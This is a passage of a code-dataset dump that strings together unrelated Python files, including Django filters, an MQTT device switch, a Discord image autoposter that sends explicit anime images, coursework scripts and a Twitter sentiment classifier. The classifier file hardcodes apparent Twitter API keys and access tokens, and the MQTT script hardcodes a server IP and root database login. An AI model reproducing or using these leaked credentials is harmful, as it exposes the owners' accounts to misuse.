**csfont)\ngraph.set_xlabel(\"Triglycerides (% total lipids)\", weight = 'bold', size = 22, **csfont)\ngraph.spines['right'].set_visible(False)\ngraph.spines['top'].set_visible(False)\n\ngraph.yaxis.set_ticks_position('left')\ngraph.xaxis.set_ticks_position('bottom')\ngraph.tick_params(axis = 'y', which = 'minor', length = 0)\n\nplt.show()\n","sub_path":"scatterTG.py","file_name":"scatterTG.py","file_ext":"py","file_size_in_byte":2323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"307974351","text":"# -*- coding: utf-8 -*-\n# \nfrom django import template\nfrom django.contrib.humanize.templatetags.humanize import intcomma\n\nregister = template.Library()\n\n@register.filter()\ndef pounds_pennies(pounds):\n\t\"\"\"\n\tFormats as 11,123.45\n\t\"\"\"\n\tif pounds:\n\t\tpounds = round(float(pounds), 2)\n\t\tcurr = u'\\u00a3'+ str(intcomma(int(pounds)) +str(\"%0.2f\" % pounds)[-3:])\n\t\treturn curr\n\telse: return ''\n\n\n@register.filter()\ndef pounds(pounds):\n\t\"\"\"\n\tFormats as 11,123.45\n\t\"\"\"\n\tif pounds:\n\t\tpounds = round(float(pounds), 0)\n\t\tcurr = u'\\u00a3'+ str(intcomma(int(pounds)))\n\t\treturn curr\n\telse: return ''\n\n@register.filter()\ndef money(pounds, currency=''):\n\t\"\"\"\n\tFormats as 11,123.45\n\t\"\"\"\n\tif 
pounds:\n\t\tpounds = int(pounds)\n\t\tcurr = currency + str(intcomma(int(pounds)))\n\t\treturn curr\n\telse: return ''\n","sub_path":"core/templatetags/money_handling.py","file_name":"money_handling.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"430472930","text":"import datetime\nimport pymysql\nfrom apscheduler.schedulers.blocking import BlockingScheduler\nimport re\nimport paho.mqtt.client as mqtt\nimport binascii\nimport json\nfrom PyCRC.CRC16 import CRC16\n\ndef getcrc(crcdm):\n    target = bytes().fromhex(crcdm)\n    crc = \"{:4X}\".format(\n        CRC16(modbus_flag=True).calculate(target))\n    crc = crc[2:4] + crc[0:2];\n    crcdm = crcdm + crc;\n    return crcdm\n\n\ndef on_connect(client, userdata, flags, rc):\n    print(\"Connected successfully \"+str(rc))\n\n# The callback for when a PUBLISH message is received from the server.\ndef on_message(client, userdata, msg):\n    print('dddd')\n    data=bytearray.hex(bytearray(msg.payload))\n    pattern = re.compile('.{1,2}')\n    s = ' '.join(pattern.findall(data))\n    datas = s.split(' ')\n    ctrnum = datas[1]\n    if ctrnum=='03':\n        df=int(datas[67]+datas[68]+datas[69]+datas[70], 16)/100\n        sydf=df\n\nclient = mqtt.Client()\nclient.on_connect = on_connect\nclient.on_message = on_message\n\nclient.connect(\"139.199.219.142\", 1883, 60)\n\n# Switch a device on or off\ndef z(equNumber,number,switch):\n\n    dyh=equNumber+'ctrraw'\n    print(dyh)\n    dm=''\n    if(switch=='open'):\n        dm=number+'06000455CC'\n        crcdm=getcrc(dm)\n    else:\n        dm=number+'06000455AA'\n        crcdm=getcrc(dm)\n    client.subscribe(dyh)\n    client.publish(dyh, bytearray.fromhex(crcdm))\n\n    client.loop_start()\n    #\n    t={}\n    t['crcdm']=crcdm\n    return t\n\n\ndef my_job():\n    db = pymysql.connect(host='127.0.0.1', port=3306, user='root', passwd='root', db='Conch', charset='utf8')\n    cursor = db.cursor()\n    # SQL statement to select all equipment records\n    sql1 = \"SELECT * FROM database_equipment \"\n\n    try:\n        # Execute the SQL statement\n        cursor.execute(sql1)\n        # Fetch the results\n        results1 = cursor.fetchall()\n        for row in results1:\n            if (row[7] == '1'):\n                z(row[1],row[2],'close')\n    except:\n        # Roll back on error\n        db.rollback()\n    db.close()\n#\nsched = BlockingScheduler()\nsched.add_job(my_job, 'cron', hour=9)\nsched.start()\n\n# my_job()\n\n\n\n\n","sub_path":"代码/后台代码/ImportDatad/switch.py","file_name":"switch.py","file_ext":"py","file_size_in_byte":2086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"111216730","text":"import requests, time, random\nfrom config import webhook_id, webhook_token\n\nwebhook_url = \"https://discordapp.com/api/webhooks/{0}/{1}\".format(webhook_id, webhook_token)\n\ndef get_img():\n    img_type = random.choice([\"lewdneko\", \"lewdkitsune\", \"hentai\", \"neko\", \"hentai_anal\"])\n    img = requests.get(\"https://nekobot.xyz/api/image?type={0}\".format(img_type)).json()\n    img = img[\"message\"]\n    payload = {\n        \"embeds\": [\n            {\n                \"color\": 0xDEADBF,\n                \"image\": {\n                    \"url\": img\n                }\n            }\n        ]\n    }\n    return payload\n\ndef post_hook():\n    requests.post(webhook_url, json=get_img())\n\nwhile True:\n    print(\"Posting Neko!\")\n    post_hook()\n    time.sleep(3600)","sub_path":"Tools/autoposter.py","file_name":"autoposter.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"419345299","text":"\r\nimport time\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\n\r\n## Given an array of integers <= 10^5, and array size <=10^4, find whether there is a majority 
element (and if so, what it is).\r\n## Idea:\r\n## Sort list.\r\n## Then iterate through and take a step of half the list length forwards. \r\n## Ex: list length = 10, say we are at idx 1 (0-indexing), check if the element at idx 6 (maybe 7th) is identical, \r\n## if so, then it is the majority element.\r\n\r\ndef main():\r\n\t\r\n\tdir_loc = \"C:/Users/Jyler/Documents/ProgrammingProjects/rosalind/\"\r\n\tfile_name = \"rosalind_maj.txt\"\r\n\t#file_name = \"ex_maj.txt\"\r\n\r\n\tnum = 0\r\n\tt0 = time.time()\r\n\twith open(dir_loc + file_name) as f1:\r\n\t\t\r\n\r\n\t\tlst_to_write = []\r\n\t\tfor line in f1:\r\n\r\n\t\t\tnum += 1\r\n\t\t\tif num == 1:\r\n\t\t\t\tk_n = line.strip(\"\\n\")\r\n\t\t\t\tk_n_lst = k_n.split(\" \")\r\n\t\t\t\tk = int( k_n_lst[0] )\r\n\t\t\t\tn = int( k_n_lst[1] )\r\n\t\t\t\t#print(\"k, n = \", k, n)\r\n\r\n\t\t\telif num > 1:\r\n\t\t\t\t#input(\"Continue?\")\r\n\t\t\t\tnumbers = line.strip(\"\\n\")\r\n\t\t\t\tnumbers_list = numbers.split(\" \")\r\n\t\t\t\tnumbers_list_int = [int(i) for i in numbers_list]\r\n\r\n\r\n\t\t\t\tnumbers_list_int.sort()\r\n\t\t\t\t#print(numbers_list_int)\r\n\t\t\t\tfound_one = None\r\n\r\n\t\t\t\tt1 = time.time()\r\n\t\t\t\tprint(\"num = \",num, \" time to half = \", t1-t0)\r\n\r\n\t\t\t\tfirst_elem = numbers_list_int[0]\r\n\t\t\t\tlast_elem = numbers_list_int[n-1]\r\n\t\t\t\tquick_chk_mid_r = numbers_list_int[(n//2)+1]\r\n\t\t\t\tquick_chk_mid_l = numbers_list_int[(n//2)-1]\r\n\t\t\t\tquick_chk_quart = numbers_list_int[(n//4)]\r\n\t\t\t\tquick_chk_3quart = numbers_list_int[( (3*n)//4 )]\r\n\t\t\t\t\r\n\r\n\t\t\t\t# Quickly check the first and last elements of the list.\r\n\t\t\t\tif ( (quick_chk_mid_r == first_elem) ):\r\n\t\t\t\t\t#found_one = 1\r\n\t\t\t\t\tlst_to_write.append(first_elem) \r\n\t\t\t\telif (quick_chk_mid_l == last_elem ):\r\n\t\t\t\t\t#found_one = 1\r\n\t\t\t\t\tlst_to_write.append(last_elem)\r\n\t\t\t\telif ( quick_chk_quart == quick_chk_3quart ):\r\n\t\t\t\t\tlst_to_write.append(quick_chk_quart)\r\n\t\t\t\telse:\r\n\t\t\t\t\tfor idx in range(1, (n//2) - 2 ):\r\n\t\t\t\t\t\tstep_fwd = idx + (n//2) \r\n\t\t\t\t\t\telement = numbers_list_int[idx]\r\n\t\t\t\t\t\tfwd_half_len = numbers_list_int[step_fwd]\r\n\t\t\t\t\t\t#print(\"numbers_list_int = \",numbers_list_int)\r\n\t\t\t\t\t\t#print(\"elem = \",element, \" fwd_half_len = \",fwd_half_len)\r\n\t\t\t\t\t\tif (element == fwd_half_len):\r\n\t\t\t\t\t\t\tfound_one = 1\r\n\t\t\t\t\t\t\tlst_to_write.append(element)\r\n\t\t\t\t\t\t\tbreak\r\n\t\t\t\t###\r\n\r\n\t\t\t\t\tif (found_one == None):\r\n\t\t\t\t\t\tlst_to_write.append(-1)\r\n\t\t\t\tprint(\"Time to determine major elem = \", time.time() - t1)\r\n\r\n\t\t\t#num += 1\r\n\t###\r\n\tprint(\"\\n\",lst_to_write)\r\n\tstring_2_write = None\r\n\tfor elem in lst_to_write:\r\n\t\tif (string_2_write == None):\r\n\t\t\tstring_2_write = str(elem)\r\n\t\telse:\r\n\t\t\tstring_2_write += \" \" + str(elem)\r\n\r\n\twith open(dir_loc + \"result_maj.txt\",'a') as f2:\r\n\t\tf2.write(string_2_write)\r\n\r\n\tprint(\"Done\")\r\n\t#print(\"Time to half-point = \", t1-t0)\r\n\tprint(\"Global time elapsed = \", time.time() - t0)\r\n\r\n\tpass","sub_path":"RosalindProblems/major_elem.py","file_name":"major_elem.py","file_ext":"py","file_size_in_byte":2822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"516826588","text":"from __future__ import print_function\n\nimport argparse\nimport datetime\nfrom os.path import join, realpath, dirname\n\nfrom dt_shell import DTCommandAbs, 
dtslogger\nfrom dt_shell.env_checks import check_docker_environment\nfrom past.builtins import raw_input\n\nfrom utils.cli_utils import start_command_in_subprocess\nfrom utils.docker_utils import get_remote_client, RPI_DUCKIEBOT_BASE, RPI_DUCKIEBOT_CALIBRATION, bind_duckiebot_data_dir\n\n\nclass DTCommand(DTCommandAbs):\n\n    @staticmethod\n    def command(shell, args):\n        script_file = join(dirname(realpath(__file__)), 'calibrate_extrinsics.sh')\n\n        prog = 'dts duckiebot calibrate_extrinsics DUCKIEBOT_NAME'\n        usage = \"\"\"\nCalibrate: \n\n    %(prog)s\n\"\"\"\n\n        parser = argparse.ArgumentParser(prog=prog, usage=usage)\n        parser.add_argument('hostname', default=None, help='Name of the Duckiebot to calibrate')\n        parsed_args = parser.parse_args(args)\n\n        from utils.networking_utils import get_duckiebot_ip\n\n        duckiebot_ip = get_duckiebot_ip(parsed_args.hostname)\n        # shell.calibrate(duckiebot_name=args[0], duckiebot_ip=duckiebot_ip)\n        script_cmd = '/bin/bash %s %s %s' % (script_file, parsed_args.hostname, duckiebot_ip)\n\n        start_command_in_subprocess(script_cmd)\n\n\ndef calibrate(duckiebot_name, duckiebot_ip):\n    local_client = check_docker_environment()\n    duckiebot_client = get_remote_client(duckiebot_ip)\n\n    duckiebot_client.images.pull(RPI_DUCKIEBOT_BASE)\n    local_client.images.pull(RPI_DUCKIEBOT_CALIBRATION)\n\n    duckiebot_client.containers.get('ros-picam').stop()\n\n    # use datetime.now() so the timestamp actually carries hours/minutes/seconds\n    timestamp = datetime.datetime.now().strftime('%Y%m%d%H%M%S')\n\n    raw_input(\"{}\\nPlace the Duckiebot on the calibration patterns and press ENTER.\".format('*' * 20))\n\n    log_file = 'out-calibrate-extrinsics-%s-%s' % (duckiebot_name, timestamp)\n    source_env = 'source /home/software/docker/env.sh'\n    rosrun_params = '-o /data/{0} > /data/{0}.log'.format(log_file)\n    ros_pkg = 'complete_image_pipeline calibrate_extrinsics'\n    start_command = '{0} && rosrun {1} {2}'.format(source_env, ros_pkg, rosrun_params)\n    dtslogger.info('Running command: {}'.format(start_command))\n\n    duckiebot_client.containers.run(image=RPI_DUCKIEBOT_CALIBRATION,\n                                    privileged=True,\n                                    network_mode='host',\n                                    volumes=bind_duckiebot_data_dir(),\n                                    command=\"/bin/bash -c '%s'\" % start_command)\n\n    raw_input(\"{}\\nPlace the Duckiebot in a lane and press ENTER.\".format('*' * 20))\n\n    log_file = 'out-pipeline-%s-%s' % (duckiebot_name, timestamp)\n    rosrun_params = '-o /data/{0} > /data/{0}.log'.format(log_file)\n    ros_pkg = 'complete_image_pipeline single_image_pipeline'\n    start_command = '{0} && rosrun {1} {2}'.format(source_env, ros_pkg, rosrun_params)\n    dtslogger.info('Running command: {}'.format(start_command))\n\n    duckiebot_client.containers.run(image=RPI_DUCKIEBOT_CALIBRATION,\n                                    privileged=True,\n                                    network_mode='host',\n                                    volumes=bind_duckiebot_data_dir(),\n                                    command=\"/bin/bash -c '%s'\" % start_command)","sub_path":"duckiebot/calibrate_extrinsics/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":3262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"190592242","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport codecs\nimport matplotlib.pyplot as plt\nfrom scipy.misc import imread\nfrom wordcloud import WordCloud\n\nback_coloring = imread(\"nlp/mask.jpg\")\nwordcloud = WordCloud(font_path='nlp/文泉驿微米黑.ttf', background_color=\"white\", mask=back_coloring)\n\n\ndef show_wordcloud(data):\n    plt.axis(\"off\")\n    wc_img = wordcloud.fit_words(data)\n    plt.imshow(wc_img)\n    plt.axis(\"on\")\n\n\ndef search_path(o, to):\n    path = \"\"\n    for k, v in list(o.items()):\n        if isinstance(v, dict):\n            sub = 
search_path(v, to)\n if sub:\n path = k + \".\" + sub\n else:\n if to == v:\n path = k\n return path\n\n\ndef leaf_path(o):\n print(o)\n for k, v in list(o.items()):\n if isinstance(v, dict):\n subs = leaf_path(v)\n for sub_k, sub_v in subs:\n yield k + \".\" + sub_k, sub_v\n else:\n yield k, v\n\n\nwith codecs.open(\"nlp/name_start.txt\", 'r', 'utf-8') as fp:\n name_start = fp.readlines()\nname_start = [start.strip() for start in name_start]\n\n\ndef name_start_set():\n return name_start\n\n\ndef start_with(p, items):\n for item in items:\n if p.startswith(item):\n return True\n return False\n\n\ndef end_with(p, items):\n for item in items:\n if p.endswith(item):\n return True\n return False\n\n\nif __name__ == '__main__':\n pass\n","sub_path":"hello/tool.py","file_name":"tool.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"379453241","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('seadssite', '0004_auto_20141029_0138'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Devices',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('DeviceId', models.IntegerField()),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='UserDevice',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('DeviceId', models.ForeignKey(to='seadssite.Devices')),\n ('UserId', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n","sub_path":"seadssite/migrations/0005_devices_userdevice.py","file_name":"0005_devices_userdevice.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"357437715","text":"\"\"\"\nCopyright (c) {{current_year}} Cisco and/or its affiliates.\n\nThis software is licensed to you under the terms of the Cisco Sample\nCode License, Version 1.1 (the \"License\"). You may obtain a copy of the\nLicense at\n\n https://developer.cisco.com/docs/licenses\n\nAll use of the material herein must be in accordance with the terms of\nthe License. All rights not expressly granted by the License are\nreserved. 
Unless required by applicable law or agreed to separately in\nwriting, software distributed under the License is distributed on an \"AS\nIS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express\nor implied.\n\nAUTHOR(s): Francisco Quiroz \n\"\"\"\n\nANSIBLE_METADATA = {\n 'metadata_version': '1.0',\n 'supported_by': 'community',\n 'status': ['preview']\n}\n\n\nfrom ansible.module_utils.basic import AnsibleModule\nimport re\n\ndef main():\n \"\"\"Ansible module to verify create a text file with configuration for a XR router.\"\"\"\n module = AnsibleModule(\n argument_spec = dict(\n var1 = dict(type ='dict', required=True),\n var2 = dict(type ='str', required=True)\n ),\n supports_check_mode=True\n )\n\n f= open( f\"{module.params['var2']}.cfg\", \"w\")\n for old_map, new_map in module.params['var1'].items():\n if not \"tbd\" in old_map:\n speed_var=re.findall(r'([0-9]+)Mbps',new_map)[0]\n pm_var = f\"\"\"policy-map {speed_var}Mbps-IN\n class class-default\n police rate {speed_var} mbps\n conform-action set precedence 0\n exceed-action drop\n !\n!\n end-policy-map\n!\n\"\"\"\n f.write(pm_var)\n f.close()\n if module.check_mode:\n module.exit_json(changed=False)\n\n module.exit_json(meta=f\"{module.params['var2']}.cfg\")\n\n\nif __name__ == '__main__':\n \"\"\"Execute main program.\"\"\"\n main()\n\n# End of module\n","sub_path":"xr-temp-main/library/demo_module_03.py","file_name":"demo_module_03.py","file_ext":"py","file_size_in_byte":1842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"461662901","text":"import json\nfrom shutil import copyfile, rmtree\nfrom os import mkdir\n\n\ndef filter(movie):\n imdb = movie['imdb_score_count'] > 0\n date = movie['release_date'] != \"\"\n genre = len(movie['genres']) > 0\n cast = len(movie['cast']) > 0\n crew = len(movie['crew']) > 0\n runtime = movie['runtime'] >= 60\n return imdb and date and genre and cast and crew and runtime\n\n\ndef main():\n\n n = 0\n rmtree(\"filtered\")\n mkdir(\"filtered\")\n mkdir(\"filtered/movies\")\n mkdir(\"filtered/posters\")\n top = []\n\n for movie in json.load(open(\"movies.json\", \"r\")):\n movie = json.load(open(\"movies/\" + movie['id'] + \".json\", \"r\"))\n\n if filter(movie):\n top.append((movie['imdb_score_count'], movie['title'], movie['id']))\n\n with open(\"filtered/movies.json\", \"w\") as f:\n f.write('[\\n')\n\n for (count, title, id) in sorted(top, reverse=True)[:5000]:\n print(count, title, n)\n copyfile(\"movies/\" + id + \".json\", \"filtered/movies/\" + id + \".json\")\n copyfile(\"posters/\" + id + \".jpg\", \"filtered/posters/\" + id + \".jpg\")\n n += 1\n f.write(\n ' {\"id\":\"%s\",\"title\":\"%s\"},\\n' % (\n id,\n title\n )\n )\n\n f.write(']\\n')\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"app/static/data/scripts/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"578102405","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport random\n\n\n#Following code found online\ndef unpickle(file):\n import pickle\n with open(file, 'rb') as fo:\n dict = pickle.load(fo, encoding='bytes')\n return dict\n\ndef load_cifar10_data(data_dir):\n '''Return train_data, train_labels, test_data, test_labels\n The shape of data is 32 x 32 x3'''\n train_data = None\n train_labels = []\n\n for i in range(1, 6):\n data_dic = unpickle(data_dir + \"/data_batch_{}\".format(i))\n if i == 1:\n 
train_data = data_dic[b'data']\n        else:\n            train_data = np.vstack((train_data, data_dic[b'data']))\n        train_labels += data_dic[b'labels']\n\n    test_data_dic = unpickle(data_dir + \"/test_batch\")\n    test_data = test_data_dic[b'data']\n    test_labels = test_data_dic[b'labels']\n\n    train_data = train_data.reshape((len(train_data), 3, 32, 32))\n    train_data = np.rollaxis(train_data, 1, 4)\n    train_labels = np.array(train_labels)\n\n    test_data = test_data.reshape((len(test_data), 3, 32, 32))\n    test_data = np.rollaxis(test_data, 1, 4)\n    test_labels = np.array(test_labels)\n\n    return train_data, train_labels, test_data, test_labels\n\ndata_dir = 'cifar-10-batches-py'\n\ntrain_data, train_labels, test_data, test_labels = load_cifar10_data(data_dir)\n\nprint(train_data.shape)\nprint(train_labels.shape)\n\nprint(test_data.shape)\nprint(test_labels.shape)\n\n#End of online code\n\n\n\n#Converting Images To Grayscale\ngsdata = []\ngsvector = []\nfor i in range(1000):\n    image = []\n    image2 = [random.uniform(0,1)]\n    for j in range(32):\n        image_row = []\n        for k in range(32):\n            temp = train_data[i,j,k].astype(int)\n            gray = int((temp[0] + temp[1] + temp[2])/3)\n            image_row.append(gray)\n            image2.append(gray)\n        image.append(image_row)\n    gsdata.append(image)\n    gsvector.append(image2)\n\n#Testing\nx = random.randint(0,1000)\nplt.imshow(gsdata[x])\nplt.show()\n\n\nweights1 = np.random.randn(1025,1025)\nweights2 = np.random.randn(1025)\n\ndef hypothesis(picture):\n    # gsvector is a plain Python list, so convert it to a float array first\n    temp = np.asarray(gsvector, dtype=np.float64)\n    z = np.matmul(temp[picture],weights1)\n    activation2 = 1/(1+np.exp(-z))\n    return np.dot(activation2,weights2)\n\nprint(hypothesis(x))","sub_path":"cifar.py","file_name":"cifar.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"302456870","text":"from flask_wtf import FlaskForm\n# from flask_debugtoolbar import DebugToolbarExtension== only for app.py\nfrom wtforms.validators import InputRequired, Optional, URL, NumberRange, Length\nfrom wtforms import StringField, IntegerField, SelectField, BooleanField\n\n\nclass AddPetForm(FlaskForm):\n    \"\"\"Form for adding a pet\"\"\"\n\n    name = StringField(\"Pet Name\", validators=[InputRequired()])\n    species = SelectField(\n        \"Species\",\n        choices=[('cat', 'Cat'), ('dog', 'Dog'), ('porcupine', 'Porcupine')],\n        validators=[InputRequired()])\n    photo_url = StringField(\"Photo URL\", validators=[Optional(), URL()])\n    age = IntegerField(\n        \"Age\", validators=[InputRequired(),\n                           NumberRange(min=1, max=29)])\n    notes = StringField(\"Notes\", validators=[Optional(), Length(max=100)])\n\n\nclass EditPetForm(FlaskForm):\n    \"\"\" Edit a pet form \"\"\"\n\n    photo_url = StringField(\"Photo URL\", validators=[Optional(), URL()])\n    notes = StringField(\"Notes\", validators=[Optional()])\n    available = BooleanField(\"Available\")\n","sub_path":"forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"529124315","text":"#!/usr/bin/python\nimport argparse, logging, sys, time\nimport zmq\nimport communication\nimport configuration\nimport serialization\n\ndef main(args, context):\n\t\n\tlogger = logging.getLogger(__name__)\n\tsettings = configuration.Config()\n\tserializer = serialization.Serializer()\n\n\tinput_data = communication.connect_socket(context, socket_type = zmq.PUB, connection = settings.connections[\"input_data\"])\n\t\n\tlogger.info(\"Starting data stream. 
Sending %d elements.\", args.n)\n\n\ttry:\n\n\t\tfor i in xrange(args.n):\n\t\t\t\n\t\t\tlogger.debug(\"Sending: %s\", str(i))\n\n\t\t\tmessage = \"Camera data packet %s\" % str(i)\n\t\t\tmessage_buffer = serializer.write_buffer(message, topic = \"camera\")\n\t\t\tinput_data.send(message_buffer)\n\t\t\t\n\t\t\ttime.sleep(args.s)\n\t\t\n\t\tlogger.info(\"Data transfer complete.\")\n\n\texcept Exception as e:\n\t\t\tlogger.exception(\"Failed sending camera data.\")\n\t\t\tlogger.info(\"Shutting down camera data stream.\")\n\t\t\tsys.exit()\n\n\treturn\n\nif __name__ == '__main__':\n\n\t# Setup for application logging\n\tlogging.basicConfig(level=logging.DEBUG, format='%(asctime)s: %(name)s: -- %(levelname)s -- %(message)s', filename=\"./log/camera_data.log\", filemode=\"w\")\n\tconsole = logging.StreamHandler()\n\tconsole.setLevel(logging.DEBUG)\n\tformatter = logging.Formatter('%(name)s: -- %(levelname)s -- %(message)s')\n\tconsole.setFormatter(formatter)\n\tlogging.getLogger(\"\").addHandler(console)\n\n\t# Setup for parsing command line arguments\n\tparser = argparse.ArgumentParser(prog=\"camera_data\", description='Simulates the behaviour of the camera generating relevant data.')\n\tparser.add_argument('-n', help='Number of data events to be send.', type=int, default=10)\n\tparser.add_argument('-s', help='Number of seconds to sleep in between two sends.', type=float, default=1)\n\targs = parser.parse_args()\n\n\tcontext = zmq.Context()\n\n\tmain(args, context)","sub_path":"shell/communication/python/camera_data.py","file_name":"camera_data.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"610382949","text":"from sklearn.naive_bayes import MultinomialNB\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.pipeline import Pipeline\nimport sklearn.datasets as skd\nfrom pathlib import Path\nimport tweepy\nimport datetime\n\nconsumer_key = \"F9rQX2nhkKcr7wOzYWncbLz3Y\"\nconsumer_secret = \"QQPPsZfssDLSXgm6w4y8I5JbgMonN1fjPdn1LMC6hMK1h0u94q\"\naccess_key = \"881673991-QOIo66W7sMhcgNzZRHBZ3X3CIQDDKk2Ci9Qt8Igu\"\naccess_secret = \"NQVOvRSycLK252HXvjPpetpRXTwJO4NY5vwu1wq62vtF4\"\ntag = ''\n\n\ndef trainModel():\n trainModel.categories = ['negative',\n 'positive']\n dataFolder = Path(\"files/train/\")\n trainModel.news_train = skd.load_files(dataFolder,\n categories=trainModel.categories, encoding='ISO-8859-1')\n\n trainModel.text_clf = Pipeline(\n [('vect', TfidfVectorizer()), ('clf', MultinomialNB())])\n # train the model\n trainModel.text_clf.fit(trainModel.news_train.data,\n trainModel.news_train.target)\n\n\ndef getSentiment():\n\n documents = []\n global tag\n hashtag = tag + \" -filter:retweets\"\n tweets = get_tweets(hashtag)\n for tweet in tweets:\n documents.append(tweet.text)\n\n tweetData = []\n # print(docs_test)\n for doc in documents:\n predicted = trainModel.text_clf.predict([doc])\n tweetData.append([doc, trainModel.categories[predicted[0]]])\n # print(predicted)\n # print(trainModel.categories[predicted[0]])\n print(tweetData)\n tweetDF = {\n \"data\": tweetData\n }\n if tweetDF:\n return tweetDF\n else:\n return \"No tweets found!\"\n # return trainModel.categories[predicted[0]]\n\n\ndef get_tweets(hashtag):\n\n # Authorization to consumer key and consumer secret\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n\n # Access to user's access key and access secret\n auth.set_access_token(access_key, access_secret)\n\n # Calling api\n api = 
tweepy.API(auth, wait_on_rate_limit=True)\n\n date_since = datetime.date.today() - datetime.timedelta(days=7)\n tweets = tweepy.Cursor(\n api.search,\n result_type='Popular',\n q=hashtag,\n lang=\"en\",\n since=date_since).items(5)\n return tweets\n\n\ndef mainApp(para_tag):\n global tag\n tag = para_tag\n # trainModel()\n tweetDF = getSentiment()\n # print(tweetDF)\n return tweetDF\n\n\n# mainApp(\"Air India\")\n","sub_path":"Sentiment Classifier (Naive Bayes)/SentimentClassifier.py","file_name":"SentimentClassifier.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"18803401","text":"import time\n\nimport picamera\n\n# ceva\n\n# https://www.instructables.com/id/Time-Lapse-Photography-With-RPI-and-Pi-Camera/\n\nNO_OF_DAYS = 1\n\nFRAMES_PER_HOUR = 360\n\nFRAMES = FRAMES_PER_HOUR * 24 * NO_OF_DAYS\n\n\ndef capture_frame(frame_):\n with picamera.PiCamera() as cam:\n time.sleep(2)\n cam.rotation = 90\n cam.resolution = (1024, 768)\n cam.capture('/home/pi/IdeaProjects/timelapse/frame%03d.jpg' % frame_)\n\n\n# Capture the images\n\nfor frame in range(FRAMES):\n # Note the time before the capture\n\n start = time.time()\n\n capture_frame(frame)\n\n # Wait for the next capture. Note that we take into\n\n # account the length of time it took to capture the\n\n # image when calculating the delay\n\n time.sleep(\n\n int(60 * 60 / FRAMES_PER_HOUR) - (time.time() - start)\n\n )\n","sub_path":"tests/Timelapse.py","file_name":"Timelapse.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"42694040","text":"# Copyright 2020 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n# sys\nimport os\nimport sys\nimport numpy as np\nimport random\nimport pickle\n\n# torch\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\nfrom torchvision import datasets, transforms\n\n# visualization\nimport time\n\n# operation\nfrom . 
import tools\n\n\nclass Feeder(torch.utils.data.Dataset):\n \"\"\" Feeder for skeleton-based action recognition\n Arguments:\n data_path: the path to '.npy' data, the shape of data should be (N, C, T, V, M)\n label_path: the path to label\n random_choose: If true, randomly choose a portion of the input sequence\n random_shift: If true, randomly pad zeros at the begining or end of sequence\n window_size: The length of the output sequence\n normalization: If true, normalize input sequence\n debug: If true, only use the first 100 samples\n \"\"\"\n\n def __init__(self,\n data_path,\n label_path,\n random_choose=False,\n random_move=False,\n window_size=-1,\n debug=False,\n mmap=True):\n self.debug = debug\n self.data_path = data_path\n self.label_path = label_path\n self.random_choose = random_choose\n self.random_move = random_move\n self.window_size = window_size\n\n self.load_data(mmap)\n\n def load_data(self, mmap):\n # data: N C V T M\n\n # load label\n with open(self.label_path, 'rb') as f:\n self.sample_name, self.label = pickle.load(f)\n\n # load data\n if mmap:\n self.data = np.load(self.data_path, mmap_mode='r')\n else:\n self.data = np.load(self.data_path)\n\n if 